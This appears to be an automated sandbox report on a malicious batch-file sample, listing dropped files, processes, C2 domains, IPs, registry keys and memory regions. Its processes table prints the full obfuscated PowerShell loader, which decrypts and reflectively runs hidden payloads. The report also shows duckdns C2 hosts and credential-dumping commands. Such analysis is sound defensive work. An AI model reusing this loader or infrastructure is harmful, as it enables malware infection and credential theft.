Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
z310517827.bat
|
ASCII text, with very long lines (20179), with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Roaming\kalmzots.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\json[1].json
|
JSON data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_inadn44g.z5u.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nvmfia32.sx0.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\bhvFB86.tmp
|
Extensible storage engine DataBase, version 0x620, checksum 0x974d3964, page size 32768, DirtyShutdown, Windows version 10.0
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\ymieiytvun
|
Unicode text, UTF-16, little-endian text, with no line terminators
|
dropped
|
||
|
C:\Users\user\dwm.bat
|
ASCII text, with very long lines (20179), with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\dwm.bat:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
\Device\Null
|
ASCII text, with CRLF line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\z310517827.bat" "
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\z310517827.bat"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiRzY3JpcHRDb250ZW50ID0gQCcNCiR1c2Vya2xyZ3JOYW1lIGtscmdyPSAkZW5rbHJncnY6VVNFa2xyZ3JSTkFNRWtscmdyOyRqbWRrbHJncm9tID0ga2xyZ3IiQzpcVWtscmdyc2Vyc1xrbHJnciR1c2Vya2xyZ3JOYW1lXGtscmdyZHdtLmJrbHJncmF0Ijtpa2xyZ3JmIChUZWtscmdyc3QtUGFrbHJncnRoICRqa2xyZ3JtZG9tKWtscmdyIHsgICBrbHJnciBXcml0a2xyZ3JlLUhvc2tscmdydCAiQmFrbHJncnRjaCBma2xyZ3JpbGUgZmtscmdyb3VuZDprbHJnciAkam1ka2xyZ3JvbSIgLWtscmdyRm9yZWdrbHJncnJvdW5ka2xyZ3JDb2xvcmtscmdyIEN5YW5rbHJncjsgICAga2xyZ3IkZmlsZWtscmdyTGluZXNrbHJnciA9IFtTa2xyZ3J5c3RlbWtscmdyLklPLkZrbHJncmlsZV06a2xyZ3I6UmVhZGtscmdyQWxsTGlrbHJncm5lcygka2xyZ3JqbWRvbWtscmdyLCBbU3lrbHJncnN0ZW0ua2xyZ3JUZXh0LmtscmdyRW5jb2RrbHJncmluZ106a2xyZ3I6VVRGOGtscmdyKTsgICBrbHJnciBmb3Jla2xyZ3JhY2ggKGtscmdyJGxpbmVrbHJnciBpbiAka2xyZ3JmaWxlTGtscmdyaW5lcylrbHJnciB7ICAga2xyZ3IgICAgIGtscmdyaWYgKCRrbHJncmxpbmUga2xyZ3ItbWF0Y2tscmdyaCAnXjprbHJncjo6ID8oa2xyZ3IuKykkJ2tscmdyKSB7ICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyV3JpdGVrbHJnci1Ib3N0a2xyZ3IgIkluamtscmdyZWN0aW9rbHJncm4gY29ka2xyZ3JlIGRldGtscmdyZWN0ZWRrbHJnciBpbiB0a2xyZ3JoZSBiYWtscmdydGNoIGZrbHJncmlsZS4ia2xyZ3IgLUZvcmtscmdyZWdyb3VrbHJncm5kQ29sa2xyZ3JvciBDeWtscmdyYW47ICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdydHJ5IHtrbHJnciAgICAga2xyZ3IgICAgIGtscmdyICAgICBrbHJnciAkZGVja2xyZ3JvZGVkQmtscmdyeXRlcyBrbHJncj0gW1N5a2xyZ3JzdGVtLmtscmdyQ29udmVrbHJncnJ0XTo6a2xyZ3JGcm9tQmtscmdyYXNlNjRrbHJnclN0cmlua2xyZ3JnKCRtYWtscmdydGNoZXNrbHJnclsxXS5Ua2xyZ3JyaW0oKWtscmdyKTsgICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyICAgJGlrbHJncm5qZWN0a2xyZ3Jpb25Db2tscmdyZGUgPSBrbHJncltTeXN0a2xyZ3JlbS5UZWtscmdyeHQuRW5rbHJncmNvZGlua2xyZ3JnXTo6VWtscmdybmljb2RrbHJncmUuR2V0a2xyZ3JTdHJpbmtscmdyZygkZGVrbHJncmNvZGVka2xyZ3JCeXRlc2tscmdyKTsgICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyICAgV3JrbHJncml0ZS1Ia2xyZ3Jvc3QgImtscmdySW5qZWNrbHJncnRpb24ga2xyZ3Jjb2RlIGtscmdyZGVjb2RrbHJncmVkIHN1a2xyZ3JjY2Vzc2tscmdyZnVsbHlrbHJnci4iIC1Ga2xyZ3JvcmVncmtscmdyb3VuZENrbHJncm9sb3Iga2xyZ3JHcmVlbmtscmdyOyAgICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyICBXcmlrbHJncnRlLUhva2xyZ3JzdCAiRWtscmdyeGVjdXRrbHJncmluZyBpa2xyZ3JuamVjdGtscmdyaW9uIGNrbHJncm9kZS4ua2xyZ3IuIiAtRmtscmdyb3JlZ3JrbHJncm91bmRDa2xyZ3JvbG9yIGtscmdyWWVsbG9rbHJncnc7ICAga2xyZ3IgICAgIGtscmdyICAgICBrbHJnciAgIElua2xyZ3J2b2tlLWtscmdyRXhwcmVrbHJncnNzaW9ua2xyZ3IgJGluamtscmdyZWN0aW9rbHJncm5Db2Rla2xyZ3I7ICAgIGtscmdyICAgICBrbHJnciAgICAga2xyZ3IgIGJyZWtscmdyYWs7ICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyfSBjYXRrbHJncmNoIHsga2xyZ3IgICAgIGtscmdyICAgICBrbHJnciAgICAga2xyZ3JXcml0ZWtscmdyLUhvc3RrbHJnciAiRXJya2xyZ3JvciBkdWtscmdycmluZyBrbHJncmRlY29ka2xyZ3Jpbmcgb2tscmdyciBleGVrbHJncmN1dGlua2xyZ3JnIGluamtscmdyZWN0aW9rbHJncm4gY29ka2xyZ3JlOiAkX2tscmdyIiAtRm9rbHJncnJlZ3Jva2xyZ3J1bmRDb2tscmdybG9yIFJrbHJncmVkOyAga2xyZ3IgICAgIGtscmdyICAgICBrbHJncn07ICAga2xyZ3IgICAgIGtscmdyfTsgICBrbHJnciB9O30ga2xyZ3JlbHNlIGtscmdyeyAgICBrbHJnciAgV3Jpa2xyZ3J0ZS1Ib2tscmdyc3QgIlNrbHJncnlzdGVta2xyZ3IgRXJyb2tscmdycjogQmFrbHJncnRjaCBma2xyZ3JpbGUgbmtscmdyb3QgZm9rbHJncnVuZDoga2xyZ3Ikam1kb2tscmdybSIgLUZrbHJncm9yZWdya2xyZ3JvdW5kQ2tscmdyb2xvciBrbHJnclJlZDsga2xyZ3IgICBleGtscmdyaXQ7fTtrbHJncmZ1bmN0a2xyZ3Jpb24gemtscmdyaWh0ZyhrbHJnciRwYXJha2xyZ3JtX3ZhcmtscmdyKXsJJGFrbHJncmVzX3Zha2xyZ3JyPVtTeWtscmdyc3RlbS5rbHJnclNlY3Vya2xyZ3JpdHkuQ2tscmdycnlwdG9rbHJncmdyYXBoa2xyZ3J5LkFlc2tscmdyXTo6Q3JrbHJncmVhdGUoa2xyZ3IpOwkkYWtscmdyZXNfdmFrbHJncnIuTW9ka2xyZ3JlPVtTeWtscmdyc3RlbS5rbHJnclNlY3Vya2xyZ3JpdHkuQ2tscmdycnlwdG9rbHJncmdyYXBoa2xyZ3J5LkNpcGtscmdyaGVyTW9rbHJncmRlXTo6a2xyZ3JDQkM7CWtscmdyJGFlc19rbHJncnZhci5Qa2xyZ3JhZGRpbmtscmdyZz1bU3lrbHJncnN0ZW0ua2xyZ3JTZWN1cmtscmdyaXR5LkNrbHJncnJ5cHRva2xyZ3JncmFwaGtscmdyeS5QYWRrbHJncmRpbmdNa2xyZ3JvZGVdOmtscmdyOlBLQ1NrbHJncjc7CSRha2xyZ3Jlc192YWtscmdyci5LZXlrbHJncj1bU3lza2xyZ3J0ZW0uQ2tscmdyb252ZXJrbHJncnRdOjpGa2xyZ3Jyb21CYWtscmdyc2U2NFNrbHJncnRyaW5na2xyZ3IoJzRFT2tscmdyVWQ2bTdrbHJncmRaempBa2xyZ3IwWXpGS2tscmdyVFBtWXlrbHJncmxpWmVDa2xyZ3JQaFMxTWtscmdyY3V5SHlrbHJncjNRVEV3a2xyZ3I9Jyk7CWtscmdyJGFlc19rbHJncnZhci5Ja2xyZ3JWPVtTeWtscmdyc3RlbS5rbHJnckNvbnZla2xyZ3JydF06OmtscmdyRnJvbUJrbHJncmFzZTY0a2xyZ3JTdHJpbmtscmdyZygnVzhrbHJncm1BT1Fha2xyZ3J2ckgxV2tscmdySTBUWEprbHJnckdMQUp3a2xyZ3I9PScpO2tscmdyCSRkZWNrbHJncnJ5cHRva2xyZ3JyX3ZhcmtscmdyPSRhZXNrbHJncl92YXIua2xyZ3JDcmVhdGtscmdyZURlY3JrbHJncnlwdG9ya2xyZ3IoKTsJJGtscmdycmV0dXJrbHJncm5fdmFya2xyZ3I9JGRlY2tscmdycnlwdG9rbHJncnJfdmFya2xyZ3IuVHJhbmtscmdyc2Zvcm1rbHJnckZpbmFsa2xyZ3JCbG9ja2tscmdyKCRwYXJrbHJncmFtX3Zha2xyZ3JyLCAwLGtscmdyICRwYXJrbHJncmFtX3Zha2xyZ3JyLkxlbmtscmdyZ3RoKTtrbHJncgkkZGVja2xyZ3JyeXB0b2tscmdycl92YXJrbHJnci5EaXNwa2xyZ3Jvc2UoKWtscmdyOwkkYWVrbHJncnNfdmFya2xyZ3IuRGlzcGtscmdyb3NlKClrbHJncjsJJHJla2xyZ3J0dXJuX2tscmdydmFyO31rbHJncmZ1bmN0a2xyZ3Jpb24gZWtscmdyYnFxeChrbHJnciRwYXJha2xyZ3JtX3ZhcmtscmdyKXsJJHBrbHJncnlzbHM9a2xyZ3JOZXctT2tscmdyYmplY3RrbHJnciBTeXN0a2xyZ3JlbS5JT2tscmdyLk1lbW9rbHJncnJ5U3Rya2xyZ3JlYW0oLGtscmdyJHBhcmFrbHJncm1fdmFya2xyZ3IpOwkkYWtscmdydmllcj1rbHJnck5ldy1Pa2xyZ3JiamVjdGtscmdyIFN5c3RrbHJncmVtLklPa2xyZ3IuTWVtb2tscmdycnlTdHJrbHJncmVhbTsJa2xyZ3IkZXZ1dGtscmdybz1OZXdrbHJnci1PYmpla2xyZ3JjdCBTeWtscmdyc3RlbS5rbHJncklPLkNva2xyZ3JtcHJlc2tscmdyc2lvbi5rbHJnckdaaXBTa2xyZ3J0cmVhbWtscmdyKCRweXNrbHJncmxzLCBba2xyZ3JJTy5Db2tscmdybXByZXNrbHJncnNpb24ua2xyZ3JDb21wcmtscmdyZXNzaW9rbHJncm5Nb2Rla2xyZ3JdOjpEZWtscmdyY29tcHJrbHJncmVzcyk7a2xyZ3IJJGV2dWtscmdydG8uQ29rbHJncnB5VG8oa2xyZ3IkYXZpZWtscmdycik7CSRrbHJncmV2dXRva2xyZ3IuRGlzcGtscmdyb3NlKClrbHJncjsJJHB5a2xyZ3JzbHMuRGtscmdyaXNwb3NrbHJncmUoKTsJa2xyZ3IkYXZpZWtscmdyci5EaXNrbHJncnBvc2Uoa2xyZ3IpOwkkYWtscmdydmllci5rbHJnclRvQXJya2xyZ3JheSgpO2tscmdyfWZ1bmNrbHJncnRpb24ga2xyZ3Jramd1bmtscmdyKCRwYXJrbHJncmFtX3Zha2xyZ3JyLCRwYWtscmdycmFtMl9rbHJncnZhcil7a2xyZ3IJJHFob2tscmdybmw9W1NrbHJncnlzdGVta2xyZ3IuUmVmbGtscmdyZWN0aW9rbHJncm4uQXNza2xyZ3JlbWJseWtscmdyXTo6KCdrbHJncmRhb0wna2xyZ3JbLTEuLmtscmdyLTRdIC1rbHJncmpvaW4ga2xyZ3InJykoW2tscmdyYnl0ZVtrbHJncl1dJHBha2xyZ3JyYW1fdmtscmdyYXIpOwlrbHJnciR3c3Rwa2xyZ3JuPSRxaGtscmdyb25sLkVrbHJncm50cnlQa2xyZ3JvaW50O2tscmdyCSR3c3RrbHJncnBuLklua2xyZ3J2b2tlKGtscmdyJG51bGxrbHJnciwgJHBha2xyZ3JyYW0yX2tscmdydmFyKTtrbHJncn0kaG9za2xyZ3J0LlVJLmtscmdyUmF3VUlrbHJnci5XaW5ka2xyZ3Jvd1RpdGtscmdybGUgPSBrbHJnciRqbWRva2xyZ3JtOyR1eGtscmdyemV1PVtrbHJnclN5c3Rla2xyZ3JtLklPLmtscmdyRmlsZV1rbHJncjo6KCd0a2xyZ3J4ZVRsbGtscmdyQWRhZVJrbHJncidbLTEua2xyZ3IuLTExXWtscmdyIC1qb2lrbHJncm4gJycpa2xyZ3IoJGptZGtscmdyb20pLlNrbHJncnBsaXQoa2xyZ3JbRW52aWtscmdycm9ubWVrbHJncm50XTo6a2xyZ3JOZXdMaWtscmdybmUpO2ZrbHJncm9yZWFja2xyZ3JoICgka2tscmdyYnFzdyBrbHJncmluICR1a2xyZ3J4emV1KWtscmdyIHsJaWZrbHJnciAoJGtia2xyZ3Jxc3cuU2tscmdydGFydHNrbHJncldpdGgoa2xyZ3InOjogJ2tscmdyKSkJewlrbHJncgkkaHp3a2xyZ3Jjcj0ka2tscmdyYnFzdy5rbHJnclN1YnN0a2xyZ3JyaW5nKGtscmdyMyk7CQlrbHJncmJyZWFra2xyZ3I7CX19JGtscmdyZ2V6Zm9rbHJncj1bc3Rya2xyZ3JpbmdbXWtscmdyXSRoendrbHJncmNyLlNwa2xyZ3JsaXQoJ2tscmdyXCcpOyRrbHJncmtjZWNqa2xyZ3I9ZWJxcWtscmdyeCAoemlrbHJncmh0ZyAoa2xyZ3JbQ29udmtscmdyZXJ0XTprbHJncjpGcm9ta2xyZ3JCYXNlNmtscmdyNFN0cmlrbHJncm5nKCRna2xyZ3JlemZvW2tscmdyMF0pKSlrbHJncjskY3V0a2xyZ3JiZj1lYmtscmdycXF4IChrbHJncnppaHRna2xyZ3IgKFtDb2tscmdybnZlcnRrbHJncl06OkZya2xyZ3JvbUJhc2tscmdyZTY0U3RrbHJncnJpbmcoa2xyZ3IkZ2V6Zmtscmdyb1sxXSlrbHJncikpO2tqa2xyZ3JndW4gJGtscmdya2NlY2prbHJnciAkbnVsa2xyZ3JsO2tqZ2tscmdydW4gJGNrbHJncnV0YmYga2xyZ3IoLFtzdGtscmdycmluZ1trbHJncl1dICgna2xyZ3IlKicpKWtscmdyOw0KJ0ANCg0KJGRlb2JmdXNjYXRlZCA9ICRzY3JpcHRDb250ZW50IC1yZXBsYWNlICdrbHJncicsICcnDQoNCkludm9rZS1FeHByZXNzaW9uICRkZW9iZnVzY2F0ZWQNCg=='))
| Invoke-Expression"
|
|
|
|
C:\Windows\SysWOW64\recover.exe
|
C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\ymieiytvun"
|
|
|
|
C:\Windows\SysWOW64\recover.exe
|
C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\bgnxiqeoiwifqy"
|
|
|
|
C:\Windows\SysWOW64\recover.exe
|
C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\lishjapiweakaeklt"
|
|
|
|
C:\Windows\SysWOW64\recover.exe
|
C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\lishjapiweakaeklt"
|
|
|
|
C:\Windows\SysWOW64\recover.exe
|
C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\lishjapiweakaeklt"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
sarok7lmoutsg1.duckdns.org
|
|
||
|
sarok7lmoutsg2.duckdns.org
|
|
||
|
sarok7lmoutsg3.duckdns.org
|
|
||
|
sarok7lmoutsg5.duckdns.org
|
|
||
|
sarok7lmoutsg4.duckdns.org
|
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.imvu.comr
|
unknown
|
||
|
http://geoplugin.net/json.gpF_
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
http://www.imvu.comta
|
unknown
|
||
|
http://geoplugin.net/json.gpi
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
http://www.imvu.com
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://geoplugin.net/json.gp%Mq
|
unknown
|
||
|
http://www.nirsoft.net
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
http://geoplugin.net/json.gpSystem32
|
unknown
|
||
|
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
|
unknown
|
||
|
http://geoplugin.net/json.gp
|
178.237.33.50
|
||
|
https://www.google.com
|
unknown
|
||
|
http://geoplugin.net/json.gp/C
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://www.google.com/accounts/servicelogin
|
unknown
|
||
|
https://login.yahoo.com/config/login
|
unknown
|
||
|
http://crl.micro9
|
unknown
|
||
|
http://www.nirsoft.net/
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://www.ebuddy.com
|
unknown
|
There are 22 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
sarok7lmoutsg5.duckdns.org
|
unknown
|
|
|
|
sarok7lmoutsg4.duckdns.org
|
unknown
|
|
|
|
sarok7lmoutsg2.duckdns.org
|
unknown
|
|
|
|
sarok7lmoutsg3.duckdns.org
|
unknown
|
|
|
|
geoplugin.net
|
178.237.33.50
|
||
|
sarok7lmoutsg1.duckdns.org
|
176.65.142.140
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
176.65.142.140
|
sarok7lmoutsg1.duckdns.org
|
Germany
|
||
|
178.237.33.50
|
geoplugin.net
|
Netherlands
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\SOFTWARE\klmiurtg-1R3I3X
|
exepath
|
||
|
HKEY_CURRENT_USER\SOFTWARE\klmiurtg-1R3I3X
|
licence
|
||
|
HKEY_CURRENT_USER\SOFTWARE\klmiurtg-1R3I3X
|
time
|
||
|
HKEY_CURRENT_USER\SOFTWARE\klmiurtg-1R3I3X
|
UID
|
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
8B29000
|
unclassified section
|
page readonly
|
|
|
|
B820000
|
unclassified section
|
page execute and read and write
|
|
|
|
8A50000
|
direct allocation
|
page read and write
|
|
|
|
400000
|
system
|
page execute and read and write
|
|
|
|
47AD000
|
heap
|
page read and write
|
||
|
76D1000
|
trusted library allocation
|
page read and write
|
||
|
B894000
|
unclassified section
|
page execute and read and write
|
||
|
3684000
|
heap
|
page read and write
|
||
|
7810000
|
trusted library allocation
|
page read and write
|
||
|
33D6000
|
heap
|
page read and write
|
||
|
47AD000
|
heap
|
page read and write
|
||
|
B438000
|
heap
|
page read and write
|
||
|
47D4000
|
heap
|
page read and write
|
||
|
5F11000
|
trusted library allocation
|
page read and write
|
||
|
47C2000
|
heap
|
page read and write
|
||
|
856E000
|
heap
|
page read and write
|
||
|
2B6B000
|
heap
|
page read and write
|
||
|
47BD000
|
heap
|
page read and write
|
||
|
47BA000
|
heap
|
page read and write
|
||
|
31CD000
|
stack
|
page read and write
|
||
|
60A8000
|
trusted library allocation
|
page read and write
|
||
|
47B5000
|
heap
|
page read and write
|
||
|
2B6C000
|
heap
|
page read and write
|
||
|
8B45000
|
unclassified section
|
page read and write
|
||
|
4910000
|
heap
|
page read and write
|
||
|
27D3000
|
stack
|
page read and write
|
||
|
45E000
|
system
|
page execute and read and write
|
||
|
8407000
|
heap
|
page read and write
|
||
|
47D6000
|
heap
|
page read and write
|
||
|
48BE000
|
stack
|
page read and write
|
||
|
47D3000
|
heap
|
page read and write
|
||
|
76C4000
|
trusted library allocation
|
page read and write
|
||
|
47BC000
|
heap
|
page read and write
|
||
|
47BC000
|
heap
|
page read and write
|
||
|
2B6B000
|
heap
|
page read and write
|
||
|
4D31000
|
heap
|
page read and write
|
||
|
4800000
|
heap
|
page read and write
|
||
|
47D3000
|
heap
|
page read and write
|
||
|
3190000
|
heap
|
page readonly
|
||
|
10000000
|
direct allocation
|
page read and write
|
||
|
F70000
|
trusted library section
|
page read and write
|
||
|
47CC000
|
heap
|
page read and write
|
||
|
99A1000
|
trusted library allocation
|
page read and write
|
||
|
4F00000
|
heap
|
page read and write
|
||
|
48F2000
|
trusted library allocation
|
page read and write
|
||
|
2B6B000
|
heap
|
page read and write
|
||
|
8451000
|
heap
|
page read and write
|
||
|
77AE000
|
stack
|
page read and write
|
||
|
FBD000
|
trusted library allocation
|
page execute and read and write
|
||
|
30BB000
|
heap
|
page read and write
|
||
|
8454000
|
heap
|
page read and write
|
||
|
2F30000
|
trusted library allocation
|
page read and write
|
||
|
3684000
|
heap
|
page read and write
|
||
|
333F000
|
stack
|
page read and write
|
||
|
7657000
|
trusted library allocation
|
page read and write
|
||
|
4D31000
|
heap
|
page read and write
|
||
|
5030000
|
trusted library allocation
|
page read and write
|
||
|
70B0000
|
heap
|
page execute and read and write
|
||
|
7820000
|
trusted library allocation
|
page read and write
|
||
|
71CE000
|
stack
|
page read and write
|
||
|
8B9E000
|
stack
|
page read and write
|
||
|
2B6B000
|
heap
|
page read and write
|
||
|
83C9000
|
heap
|
page read and write
|
||
|
47B8000
|
heap
|
page read and write
|
||
|
76B6000
|
trusted library allocation
|
page read and write
|
||
|
47BA000
|
heap
|
page read and write
|
||
|
8AD0000
|
unclassified section
|
page readonly
|
||
|
47C4000
|
heap
|
page read and write
|
||
|
4D32000
|
heap
|
page read and write
|
||
|
76E5000
|
trusted library allocation
|
page read and write
|
||
|
7880000
|
trusted library allocation
|
page read and write
|
||
|
10016000
|
direct allocation
|
page execute and read and write
|
||
|
8620000
|
trusted library allocation
|
page read and write
|
||
|
4943000
|
heap
|
page read and write
|
||
|
4DF0000
|
heap
|
page readonly
|
||
|
47BA000
|
heap
|
page read and write
|
||
|
B420000
|
heap
|
page read and write
|
||
|
4923000
|
heap
|
page read and write
|
||
|
83B0000
|
heap
|
page read and write
|
||
|
2B6B000
|
heap
|
page read and write
|
||
|
47CD000
|
heap
|
page read and write
|
||
|
4D10000
|
heap
|
page read and write
|
||
|
AA82000
|
trusted library allocation
|
page read and write
|
||
|
89D0000
|
trusted library section
|
page read and write
|
||
|
3564000
|
heap
|
page read and write
|
||
|
2B6C000
|
heap
|
page read and write
|
||
|
47C9000
|
heap
|
page read and write
|
||
|
3560000
|
heap
|
page read and write
|
||
|
5030000
|
trusted library allocation
|
page read and write
|
||
|
A251000
|
trusted library allocation
|
page read and write
|
||
|
8B42000
|
unclassified section
|
page read and write
|
||
|
30BB000
|
heap
|
page read and write
|
||
|
47F3000
|
heap
|
page read and write
|
||
|
47AC000
|
heap
|
page read and write
|
||
|
4D31000
|
heap
|
page read and write
|
||
|
4DEE000
|
stack
|
page read and write
|
||
|
5220000
|
heap
|
page read and write
|
||
|
7630000
|
trusted library allocation
|
page execute and read and write
|
||
|
47BD000
|
heap
|
page read and write
|
||
|
AA7A000
|
trusted library allocation
|
page read and write
|
||
|
10001000
|
direct allocation
|
page execute and read and write
|
||
|
74FE000
|
stack
|
page read and write
|
||
|
30BB000
|
heap
|
page read and write
|
||
|
4CEF000
|
stack
|
page read and write
|
||
|
4DE0000
|
heap
|
page read and write
|
||
|
B38E000
|
stack
|
page read and write
|
||
|
FB3000
|
trusted library allocation
|
page execute and read and write
|
||
|
30BB000
|
heap
|
page read and write
|
||
|
84D8000
|
heap
|
page read and write
|
||
|
47C4000
|
heap
|
page read and write
|
||
|
47CC000
|
heap
|
page read and write
|
||
|
BC6C000
|
unclassified section
|
page execute and read and write
|
||
|
30BB000
|
heap
|
page read and write
|
||
|
B3CF000
|
stack
|
page read and write
|
||
|
82C0000
|
trusted library allocation
|
page read and write
|
||
|
4913000
|
heap
|
page read and write
|
||
|
2D10000
|
heap
|
page read and write
|
||
|
47B1000
|
heap
|
page read and write
|
||
|
47CC000
|
heap
|
page read and write
|
||
|
A464000
|
trusted library allocation
|
page read and write
|
||
|
8C9E000
|
stack
|
page read and write
|
||
|
CF0000
|
heap
|
page read and write
|
||
|
2B6B000
|
heap
|
page read and write
|
||
|
AA86000
|
trusted library allocation
|
page read and write
|
||
|
74BE000
|
stack
|
page read and write
|
||
|
47BA000
|
heap
|
page read and write
|
||
|
47D3000
|
heap
|
page read and write
|
||
|
76C0000
|
trusted library allocation
|
page read and write
|
||
|
47BC000
|
heap
|
page read and write
|
||
|
9611000
|
trusted library allocation
|
page read and write
|
||
|
326B000
|
heap
|
page read and write
|
||
|
47D4000
|
heap
|
page read and write
|
||
|
F80000
|
heap
|
page read and write
|
||
|
47C9000
|
heap
|
page read and write
|
||
|
32A7000
|
heap
|
page read and write
|
||
|
27CF000
|
stack
|
page read and write
|
||
|
47D7000
|
heap
|
page read and write
|
||
|
47BC000
|
heap
|
page read and write
|
||
|
4900000
|
heap
|
page read and write
|
||
|
47D3000
|
heap
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
3680000
|
heap
|
page read and write
|
||
|
30BB000
|
heap
|
page read and write
|
||
|
83CD000
|
heap
|
page read and write
|
||
|
47AB000
|
heap
|
page read and write
|
||
|
2FD0000
|
heap
|
page read and write
|
||
|
4927000
|
heap
|
page read and write
|
||
|
4920000
|
heap
|
page read and write
|
||
|
4781000
|
heap
|
page read and write
|
||
|
4790000
|
heap
|
page read and write
|
||
|
2B6B000
|
heap
|
page read and write
|
||
|
7687000
|
trusted library allocation
|
page read and write
|
||
|
47CC000
|
heap
|
page read and write
|
||
|
3684000
|
heap
|
page read and write
|
||
|
47D3000
|
heap
|
page read and write
|
||
|
32A1000
|
heap
|
page read and write
|
||
|
47F3000
|
heap
|
page read and write
|
||
|
47CC000
|
heap
|
page read and write
|
||
|
47CC000
|
heap
|
page read and write
|
||
|
5030000
|
trusted library allocation
|
page read and write
|
||
|
47BD000
|
heap
|
page read and write
|
||
|
47E7000
|
heap
|
page read and write
|
||
|
2B6B000
|
heap
|
page read and write
|
||
|
47CC000
|
heap
|
page read and write
|
||
|
2F2F000
|
stack
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
4800000
|
heap
|
page read and write
|
||
|
720E000
|
stack
|
page read and write
|
||
|
744E000
|
stack
|
page read and write
|
||
|
874E000
|
stack
|
page read and write
|
||
|
78A0000
|
trusted library allocation
|
page read and write
|
||
|
4800000
|
heap
|
page read and write
|
||
|
2DFE000
|
stack
|
page read and write
|
||
|
47CE000
|
heap
|
page read and write
|
||
|
8600000
|
trusted library allocation
|
page read and write
|
||
|
4D31000
|
heap
|
page read and write
|
||
|
AC94000
|
trusted library allocation
|
page read and write
|
||
|
2DA0000
|
heap
|
page read and write
|
||
|
47D7000
|
heap
|
page read and write
|
||
|
348F000
|
stack
|
page read and write
|
||
|
47AB000
|
heap
|
page read and write
|
||
|
47D3000
|
heap
|
page read and write
|
||
|
AA84000
|
trusted library allocation
|
page read and write
|
||
|
2B6B000
|
heap
|
page read and write
|
||
|
83A0000
|
trusted library allocation
|
page read and write
|
||
|
8436000
|
heap
|
page read and write
|
||
|
5030000
|
trusted library allocation
|
page read and write
|
||
|
31DE000
|
stack
|
page read and write
|
||
|
47B5000
|
heap
|
page read and write
|
||
|
47AB000
|
heap
|
page read and write
|
||
|
8637000
|
trusted library allocation
|
page read and write
|
||
|
27BC000
|
stack
|
page read and write
|
||
|
8B48000
|
unclassified section
|
page readonly
|
||
|
7800000
|
trusted library allocation
|
page read and write
|
||
|
834D000
|
stack
|
page read and write
|
||
|
82B0000
|
trusted library allocation
|
page read and write
|
||
|
60BB000
|
trusted library allocation
|
page read and write
|
||
|
78B0000
|
trusted library allocation
|
page read and write
|
||
|
76BB000
|
trusted library allocation
|
page read and write
|
||
|
47C4000
|
heap
|
page read and write
|
||
|
47BC000
|
heap
|
page read and write
|
||
|
47BA000
|
heap
|
page read and write
|
||
|
7556000
|
heap
|
page read and write
|
||
|
303A000
|
stack
|
page read and write
|
||
|
F3E000
|
stack
|
page read and write
|
||
|
77ED000
|
stack
|
page read and write
|
||
|
B4EA000
|
heap
|
page read and write
|
||
|
60C1000
|
trusted library allocation
|
page read and write
|
||
|
7830000
|
trusted library allocation
|
page read and write
|
||
|
47D9000
|
heap
|
page read and write
|
||
|
30BB000
|
heap
|
page read and write
|
||
|
47E7000
|
heap
|
page read and write
|
||
|
